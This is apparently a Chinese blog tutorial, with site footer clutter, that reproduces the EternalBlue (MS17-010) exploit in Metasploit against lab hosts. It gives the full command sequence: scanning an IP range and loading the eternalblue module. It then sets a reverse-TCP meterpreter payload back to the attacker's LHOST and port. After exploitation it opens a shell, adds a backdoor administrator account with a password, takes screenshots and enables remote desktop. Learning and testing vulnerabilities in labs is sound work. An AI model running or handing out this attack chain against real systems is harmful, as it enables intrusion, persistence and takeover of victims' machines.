永恒之蓝漏洞复现

MS17_010(永恒之蓝):
我们现在模拟使用 MS17_010 漏洞攻击,这个漏洞就是危害全球的勒索病毒利用的永恒之蓝漏洞。

一、查找漏洞相关模块:
1、在kali命令行里面输入命令msfconsole,进入msf框架中:

msfconsole #输入这个命令主要是进入msf渗透框架中


2、搜索MS17_010漏洞:
命令:

search ms17_010 #利用search命令,搜索漏洞相关利用模块

这里找到了四个模块,前三个是漏洞利用模块,后两个是辅助模块,主要探测主机是否存在MS17_010漏洞。

二、利用Auxiliary辅助探测模块对漏洞进行探测:
Auxiliary辅助探测模块:

该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试。
1、使用smb_ms17_010漏洞探测模块对smb_ms17_010漏洞进行探测:命令:

use auxiliary/scanner/smb/smb_ms17_010


2、查看这个模块需要配置的信息:

命令:
show options #查看这个模块需要配置的信息


3、设置要探测的远程目标:

注:RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞

命令:

set rhosts 192.168.100.100-192.168.100.190


4、对上面设置的ip范围内的主机进行攻击:注:有+号的就是可能存在漏洞的主机,这里有2个主机存在漏洞

命令:

exploit

三、 使用Exploit漏洞利用模块对漏洞进行利用:
1、选择漏洞攻击模块,对漏洞进行利用:

命令:

use exploit/windows/smb/ms17_010_eternalblue


2、查看这个漏洞的信息:

命令:

info: #查看这个漏洞的信息


3、查看可攻击的系统平台,显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统:命令:

show targets


注:这里只有一个,有些其他的漏洞模块对操作系统的语言和版本要求的很严,比如MS08_067,这样就要我们指定目标系统的版本的。如果不设置的话,MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)。
 

四、 Payload攻击载荷模块:
攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令。
1、查看攻击载荷

:命令:
 

show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payload


2、设置攻击载荷:

命令:

set payload windows/x64/meterpreter/reverse_tcp


3、查看模块需要配置的参数:

命令:
show options


4、设置攻击载荷参数:

命令:

set RHOST 192.168.100.158 #设置RHOST,也就是要攻击主机的ip

set LHOST 192.168.100.132 #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell

set lport 6666 #设置lport,也就是我们主机的端口,反弹shell到这个端口;如果我们这里不设置lport的话,默认是4444端口监听;


5、进行攻击:

1 shell # 获取交互shell窗口

2 net user luze admin@1234! /add # 添加用户

3 net localgroup administrators luze /add # 将用户添加到管理员组里面

1 screenshot #截图目标主机屏幕

2 run getgui -e #开启目标3389

3 rdesktop #远程连接

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值